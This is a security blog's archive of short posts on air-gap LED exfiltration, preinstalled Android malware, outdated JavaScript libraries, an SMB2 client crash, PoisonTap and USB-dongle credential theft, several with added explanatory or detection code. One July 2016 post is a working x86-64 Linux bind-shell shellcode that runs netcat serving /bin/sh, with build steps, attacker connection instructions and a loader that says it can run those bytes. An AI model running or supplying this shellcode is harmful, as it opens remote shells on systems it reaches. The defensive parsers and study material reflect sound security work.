Mar 17 23

In the new paper titled "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED", researchers at the Ben-Gurion University Cyber Security Research Center present a method for exfiltrating data from an isolated ("air-gapped") computer at up to 4000 bits per second: malware on the machine modulates the hard drive activity LED by triggering disk activity, and the resulting pulses of light are read from a distance with various types of cameras and light sensors.
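To make the channel concrete, here is an added example (my own code, not from the paper) of the simplest modulation such an optical channel can use, on-off keying: the sender emits one brightness level per sample with the LED "on" for a 1 bit and "off" for a 0 bit, a crude sensor model attenuates the signal and adds ambient light, and the receiver thresholds the middle sample of each bit period and repacks the bits. The sample rate, threshold and sensor model are assumptions chosen for illustration; the paper's exact modulation and timings are not described on this page.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* On-off-keyed optical covert channel, sender and receiver (constructed example).
 * The "LED" is one brightness value per sample: 255 = on (disk activity), 0 = off.
 * With SAMPLES_PER_BIT samples per bit, a sensor sampled at 4 x 4000 Hz would
 * carry the 4000 bit/s the paper reports; both constants are assumptions here. */
#define SAMPLES_PER_BIT 4
#define THRESHOLD 128           /* brightness above which the LED counts as "on" */

/* Sender: one brightness sample per tick, MSB first. Returns samples written. */
size_t ook_encode(const uint8_t *msg, size_t len, uint8_t *samples, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        for (int b = 7; b >= 0; b--) {
            uint8_t level = ((msg[i] >> b) & 1) ? 255 : 0;
            for (int s = 0; s < SAMPLES_PER_BIT; s++) {
                if (n == cap) return n;          /* output buffer full */
                samples[n++] = level;
            }
        }
    }
    return n;
}

/* Camera/sensor model: attenuation, ambient light and a little deterministic jitter.
 * "On" samples end up around 188..198, "off" samples around 35..45. */
void sensor_model(uint8_t *samples, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        int v = samples[i] * 6 / 10 + 40 + (int)(i * 7 % 11) - 5;
        samples[i] = (uint8_t)v;
    }
}

/* Receiver: sample the middle of each bit period, threshold, repack into bytes.
 * Returns bytes decoded; a trailing partial byte is dropped. */
size_t ook_decode(const uint8_t *samples, size_t n, uint8_t *out, size_t cap)
{
    size_t nbits = n / SAMPLES_PER_BIT, nbytes = 0;
    uint8_t acc = 0;
    for (size_t i = 0; i < nbits; i++) {
        int bit = samples[i * SAMPLES_PER_BIT + SAMPLES_PER_BIT / 2] > THRESHOLD;
        acc = (uint8_t)((acc << 1) | bit);
        if ((i & 7) == 7) {
            if (nbytes == cap) break;
            out[nbytes++] = acc;
            acc = 0;
        }
    }
    return nbytes;
}

/* Round-trip a string through sender, sensor and receiver; 1 on success, 0 otherwise. */
int roundtrip_ok(const char *msg)
{
    uint8_t samples[4096], decoded[128];
    size_t len = strlen(msg);
    if (len > sizeof decoded || len * 8 * SAMPLES_PER_BIT > sizeof samples) return 0;
    size_t n = ook_encode((const uint8_t *)msg, len, samples, sizeof samples);
    sensor_model(samples, n);
    size_t got = ook_decode(samples, n, decoded, sizeof decoded);
    return got == len && memcmp(decoded, msg, len) == 0;
}

int main(void)
{
    printf("round trip %s\n", roundtrip_ok("LED-it-GO") ? "ok" : "FAILED");
    return 0;
}
```

Sampling the middle of each bit period is what makes the receiver tolerant of the sensor's ambient offset and jitter; a real receiver additionally needs a preamble to find the bit boundaries, which this example skips by assuming the first sample is the start of the first bit.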

Find out more:
* Cameras can Steal Data from Computer Hard Drive LED Lights
* PDF version of the paper
* LED-it-GO – YouTube video

written by d45id

Mar 17 15

Researchers from the Check Point Mobile Research Team detected infections on 36 Android devices from different manufacturers. Security breaches on Android devices are nothing new, but this case is interesting because the malware was already present on the devices before the users received them. The malicious apps were not part of the official ROM supplied by the vendor and were added somewhere along the supply chain.

Find out more in Preinstalled Malware Targeting Mobile Users

written by d45id

Mar 17 13

Scientists from Northeastern University in Boston selected what they consider the most popular JavaScript libraries (out of roughly 100,000) and checked on 133,000 websites which versions of those libraries are in use.

As a result of their study, they report that 37 percent of the scanned domains use at least one vulnerable library version, and on 10 percent two or more vulnerable JavaScript libraries are in use. In addition, many of the analysed websites still load libraries such as SWFObject and YUI that no longer receive support.

For their selection, the scientists chose widespread libraries such as Bootstrap and jQuery. 75,000 of the examined websites come from the Alexa ranking; the rest are randomly selected pages under .com domains.

Paper:
Thou Shalt Not Depend on Me: Analysing the Use of Outdated JavaScript Libraries on the Web

written by d45id

Feb 17 03

Microsoft Windows contains a memory corruption bug in the handling of SMB traffic. In particular, Windows fails to properly handle a specially crafted server response that contains too many bytes following the structure defined by the SMB2 TREE_CONNECT Response. By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys.
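The point of the advisory is that a TREE_CONNECT Response is a fixed-size, 16-byte structure, so a client parser has no business consuming anything beyond it. As an added example (my own code, not Windows' mrxsmb20.sys and not from the advisory), here is a bounds-checking validator for that message plus a constructed sample response with an adjustable number of trailing junk bytes. Field offsets follow MS-SMB2 (64-byte header, section 2.2.1; TREE_CONNECT Response, section 2.2.10); the NetBIOS session header is assumed to be stripped already, and compounded replies (NextCommand != 0) are rejected rather than handled.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SMB2_HDR_LEN                64
#define SMB2_TREE_CONNECT           0x0003
#define SMB2_FLAGS_SERVER_TO_REDIR  0x00000001u
#define TREE_CONNECT_RSP_LEN        16          /* StructureSize is fixed at 16 */

enum smb_verdict {
    SMB_OK = 0, SMB_TOO_SHORT, SMB_BAD_MAGIC, SMB_BAD_HDR_SIZE, SMB_WRONG_CMD,
    SMB_NOT_RESPONSE, SMB_COMPOUND_UNSUPPORTED, SMB_BAD_STRUCT_SIZE, SMB_TRAILING_BYTES
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Validate one SMB2 message that is expected to be a TREE_CONNECT Response. */
enum smb_verdict validate_tree_connect_rsp(const uint8_t *pkt, size_t len, uint32_t *maximal_access)
{
    if (len < SMB2_HDR_LEN + TREE_CONNECT_RSP_LEN) return SMB_TOO_SHORT;
    if (memcmp(pkt, "\xfeSMB", 4) != 0) return SMB_BAD_MAGIC;               /* ProtocolId */
    if (le16(pkt + 4) != SMB2_HDR_LEN) return SMB_BAD_HDR_SIZE;              /* StructureSize */
    if (le16(pkt + 12) != SMB2_TREE_CONNECT) return SMB_WRONG_CMD;           /* Command */
    if (!(le32(pkt + 16) & SMB2_FLAGS_SERVER_TO_REDIR)) return SMB_NOT_RESPONSE; /* Flags */
    if (le32(pkt + 20) != 0) return SMB_COMPOUND_UNSUPPORTED;                /* NextCommand */

    const uint8_t *body = pkt + SMB2_HDR_LEN;
    if (le16(body) != TREE_CONNECT_RSP_LEN) return SMB_BAD_STRUCT_SIZE;
    /* The structure is fixed-length and the reply is not compounded, so nothing may
     * follow it. Reading on past this point trusting the server is the bug class the
     * advisory describes. */
    if (len != SMB2_HDR_LEN + TREE_CONNECT_RSP_LEN) return SMB_TRAILING_BYTES;

    if (maximal_access) *maximal_access = le32(body + 12);                  /* MaximalAccess */
    return SMB_OK;
}

/* Constructed sample: a minimal TREE_CONNECT Response followed by `extra` junk bytes. */
size_t build_tree_connect_rsp(uint8_t *buf, size_t cap, size_t extra)
{
    size_t total = SMB2_HDR_LEN + TREE_CONNECT_RSP_LEN + extra;
    if (total > cap) return 0;
    memset(buf, 0, total);
    memcpy(buf, "\xfeSMB", 4);
    put16(buf + 4, SMB2_HDR_LEN);
    put16(buf + 12, SMB2_TREE_CONNECT);
    put32(buf + 16, SMB2_FLAGS_SERVER_TO_REDIR);
    put32(buf + 36, 1);                                /* TreeId */
    uint8_t *body = buf + SMB2_HDR_LEN;
    put16(body, TREE_CONNECT_RSP_LEN);
    body[2] = 0x01;                                    /* ShareType: disk */
    put32(body + 12, 0x001F01FFu);                     /* MaximalAccess: FILE_ALL_ACCESS */
    memset(body + TREE_CONNECT_RSP_LEN, 0x41, extra);  /* the oversized tail */
    return total;
}

/* Demo/test helper: verdict for a sample response carrying `extra` trailing bytes. */
enum smb_verdict verdict_for_extra(size_t extra)
{
    uint8_t buf[8192];
    size_t n = build_tree_connect_rsp(buf, sizeof buf, extra);
    return n ? validate_tree_connect_rsp(buf, n, NULL) : SMB_TOO_SHORT;
}

int main(void)
{
    printf("well-formed: %d, with 4000 trailing bytes: %d\n",
           verdict_for_extra(0), verdict_for_extra(4000));
    return 0;
}
```

Every length check is done before the corresponding read, and the verdict is an enum rather than a crash, which is the behaviour one wants from a client-side parser that talks to servers it does not control.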

written by d45id

Nov 16 17

Samy Kamkar released PoisonTap, an amazing new tool for the Raspberry Pi Zero that siphons cookies, exposes the internal router and installs a persistent web-based backdoor on locked computers.

Project site: https://samy.pl/poisontap/
Source code: https://github.com/samyk/poisontap

written by d45id

Sep 16 08

Security researcher Robert Fuller discovered an attack with which Windows and Mac user credentials can be stolen from a locked machine.
The attack works against current Windows and Mac OS computers on which a user has already logged in; the screen lock does not stop it.

He used USB-based Ethernet dongles such as the USB Armory or the Hak5 LAN Turtle, modifying their firmware to run software that makes the plug-and-play USB device the network gateway, DNS and WPAD server of the computer it is connected to.
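Both this attack and PoisonTap in the post above rely on the host accepting network configuration from a USB adapter it has never seen; the adapter hands out a DHCP lease naming itself as gateway and resolver, and in Fuller's variant also as WPAD server. As an added example (my own code, not Fuller's or Kamkar's), here is a bounds-checked walk over a DHCP OFFER's option list that reports whether the offer tries to become gateway (option 3), DNS (option 6) and proxy-autoconfig server (option 252) at once, together with a constructed sample offer. The 192.168.0.1 address and wpad.dat URL in the sample are hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout: 236 bytes of fixed BOOTP fields, the 4-byte magic cookie, then
 * type-length-value options terminated by 255 (RFC 2131/2132). */
#define BOOTP_FIXED_LEN 236
#define DHCP_OPT_START  240
#define OPT_PAD     0
#define OPT_ROUTER  3
#define OPT_DNS     6
#define OPT_MSGTYPE 53
#define OPT_WPAD    252
#define OPT_END     255

struct offer_findings {
    int has_router, has_dns, has_wpad;
    uint32_t router;                 /* first router address, host byte order */
    char wpad_url[128];
};

/* 0 when the option list is well-formed, -1 on a truncated or overrunning option. */
int parse_dhcp_options(const uint8_t *pkt, size_t len, struct offer_findings *f)
{
    memset(f, 0, sizeof *f);
    if (len < DHCP_OPT_START || memcmp(pkt + BOOTP_FIXED_LEN, "\x63\x82\x53\x63", 4) != 0)
        return -1;
    size_t i = DHCP_OPT_START;
    while (i < len) {
        uint8_t code = pkt[i++];
        if (code == OPT_PAD) continue;
        if (code == OPT_END) return 0;
        if (i >= len) return -1;                   /* length byte missing */
        size_t olen = pkt[i++];
        if (olen > len - i) return -1;             /* option runs past the packet */
        const uint8_t *v = pkt + i;
        if (code == OPT_ROUTER && olen >= 4) {
            f->has_router = 1;
            f->router = (uint32_t)v[0] << 24 | (uint32_t)v[1] << 16 | (uint32_t)v[2] << 8 | v[3];
        } else if (code == OPT_DNS && olen >= 4) {
            f->has_dns = 1;
        } else if (code == OPT_WPAD) {
            size_t n = olen < sizeof f->wpad_url - 1 ? olen : sizeof f->wpad_url - 1;
            memcpy(f->wpad_url, v, n);
            f->wpad_url[n] = '\0';
            f->has_wpad = 1;
        }
        i += olen;
    }
    return -1;                                     /* ran off the end without END */
}

/* An offer that wants to be gateway, resolver and proxy-autoconfig server at once is
 * what a rogue USB NIC sends; from a freshly attached adapter it should be refused. */
int offer_claims_gateway_dns_wpad(const struct offer_findings *f)
{
    return f->has_router && f->has_dns && f->has_wpad;
}

static size_t put_opt(uint8_t *p, uint8_t code, const void *v, uint8_t n)
{
    p[0] = code; p[1] = n; memcpy(p + 2, v, n);
    return 2 + (size_t)n;
}

/* Constructed sample OFFER (hypothetical addresses). Returns packet length, 0 if cap is too small. */
size_t build_sample_offer(uint8_t *buf, size_t cap, int with_wpad)
{
    static const uint8_t gw[4] = {192, 168, 0, 1};
    static const char wpad[] = "http://192.168.0.1/wpad.dat";
    uint8_t type = 2;                              /* DHCPOFFER */
    if (cap < DHCP_OPT_START + 64) return 0;
    memset(buf, 0, cap);
    buf[0] = 2;                                    /* op = BOOTREPLY */
    memcpy(buf + BOOTP_FIXED_LEN, "\x63\x82\x53\x63", 4);
    size_t i = DHCP_OPT_START;
    i += put_opt(buf + i, OPT_MSGTYPE, &type, 1);
    i += put_opt(buf + i, OPT_ROUTER, gw, 4);
    i += put_opt(buf + i, OPT_DNS, gw, 4);
    if (with_wpad) i += put_opt(buf + i, OPT_WPAD, wpad, (uint8_t)(sizeof wpad - 1));
    buf[i++] = OPT_END;
    return i;
}

/* Demo/test helper: 1 if the sample offer trips the check, 0 if not, -1 on parse error. */
int sample_offer_flagged(int with_wpad)
{
    uint8_t pkt[512];
    struct offer_findings f;
    size_t n = build_sample_offer(pkt, sizeof pkt, with_wpad);
    if (n == 0 || parse_dhcp_options(pkt, n, &f) != 0) return -1;
    return offer_claims_gateway_dns_wpad(&f);
}

int main(void)
{
    printf("offer with WPAD flagged: %d, without: %d\n", sample_offer_flagged(1), sample_offer_flagged(0));
    return 0;
}
```

Flagging the offer is the detection angle; the actual defence is policy, namely not letting a newly attached network adapter change the default route, the resolver or the proxy configuration of a locked machine at all.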
Find out more:

written by d45id

Jul 16 06

Floser Bacurio and Roland Dela Paz published an interesting article about Locky’s new anti-sandbox technique and how to crack it.

Find out more: Cracking Locky’s New Anti-Sandbox Technique

written by d45id

Jul 16 06
#include <stdio.h>
#include <string.h>

// Build:    gcc -fno-stack-protector -z execstack -no-pie -o bindshell bindshell.c
//           (on x86-64 kernels where -z execstack no longer makes .data executable,
//            copy the bytes into an mmap()'d PROT_EXEC buffer before calling them)
// Victim:   netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>

// Listening port as two ASCII digits ("99"), spliced into the "-p" argument below.
// Keep to two bytes so the push stays 4 bytes wide and NUL-free.
#define PORT "\x39\x39"

// 64-byte x86-64 Linux bind shell, NUL-free:
//   execve("//bin/nc", {"//bin/nc", "-p" PORT, "-lve", "//bin/sh", NULL}, NULL)
unsigned char code[] =
"\x48\x31\xff\x48\xf7\xe7"                                      // xor rdi,rdi ; mul rdi -> rax = rdx = 0
"\x50"                                                          // push rax (string terminator)
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7"      // push "//bin/nc" ; rdi = rsp
"\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3"  // push "//bin/sh" ; rbx = rsp
"\x68\x2d\x6c\x76\x65\x48\x89\xe1"                              // push "-lve"     ; rcx = rsp
"\x68\x2d\x70" PORT "\x48\x89\xe6"                              // push "-p99"     ; rsi = rsp
"\x50\x53\x51\x56\x57\x48\x89\xe6"                              // push NULL, argv[3..0] ; rsi = argv
"\xb0\x3b\x0f\x05";                                             // mov al,59 ; syscall (execve)

int main(void)
{
    // No NULs inside the shellcode: strlen() would stop at the first \x00.
    printf("The Shellcode is %zu Bytes Long\n", strlen((char *)code));

    // Fill every general-purpose register with 0xAA.. before jumping in, so the
    // shellcode is shown not to depend on leftover register state. The shellcode
    // zeroes rax/rdx itself and builds everything it needs on the stack.
    __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
            "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
            "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
            "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
            "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
            "call code");          // execve() does not return on success
    return 0;
}
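Two things the loader above takes on trust are worth checking explicitly: that the payload really contains no bytes that would terminate or mangle it on the way in, and that the bytes land in memory the CPU is allowed to execute (calling into a .data array fails on an NX system unless the binary is built with an executable data segment). As an added example (my own code, not part of the original post), here is a bad-byte scanner and an mmap()-based loader that copies a payload into a fresh mapping and then flips it to read-execute; the two stubs it runs on are constructed for the example and simply return 42.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Returns how many bytes of `buf` appear in the `bad` list (e.g. NUL, LF, CR). */
size_t count_bad_bytes(const unsigned char *buf, size_t len, const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { hits++; break; }
    return hits;
}

typedef long (*sc_fn)(void);

/* Copy `len` bytes into a private anonymous mapping, make it RX and return it as a
 * callable; NULL on failure. Writing first and executing later keeps W^X policies happy. */
sc_fn load_shellcode(const unsigned char *buf, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, buf, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) { munmap(mem, len); return NULL; }
    return (sc_fn)mem;
}

/* Constructed x86-64 stubs: `xor eax,eax; mov al,42; ret` is NUL-free and returns 42;
 * `mov eax,42; ret` does the same job but carries three NULs in its immediate. */
static const unsigned char good_stub[] = "\x31\xc0\xb0\x2a\xc3";
static const unsigned char null_stub[] = {0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3};
static const unsigned char bad[] = {0x00, 0x0a, 0x0d};

size_t bad_bytes_in_good_stub(void) { return count_bad_bytes(good_stub, sizeof good_stub - 1, bad, sizeof bad); }
size_t bad_bytes_in_null_stub(void) { return count_bad_bytes(null_stub, sizeof null_stub, bad, sizeof bad); }

/* Runs the NUL-free stub from the RX mapping and returns its value (42);
 * -1 when not on x86-64 or when the mapping could not be created. */
long run_good_stub(void)
{
#if defined(__x86_64__)
    size_t len = sizeof good_stub - 1;
    sc_fn fn = load_shellcode(good_stub, len);
    if (!fn) return -1;
    long r = fn();
    munmap((void *)fn, len);
    return r;
#else
    return -1;
#endif
}

int main(void)
{
    printf("bad bytes: good stub %zu, null stub %zu; stub returned %ld\n",
           bad_bytes_in_good_stub(), bad_bytes_in_null_stub(), run_good_stub());
    return 0;
}
```

The same loader can take the 64 bind-shell bytes above in place of the stub; it then never returns, because execve() replaces the process on success.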

written by d45id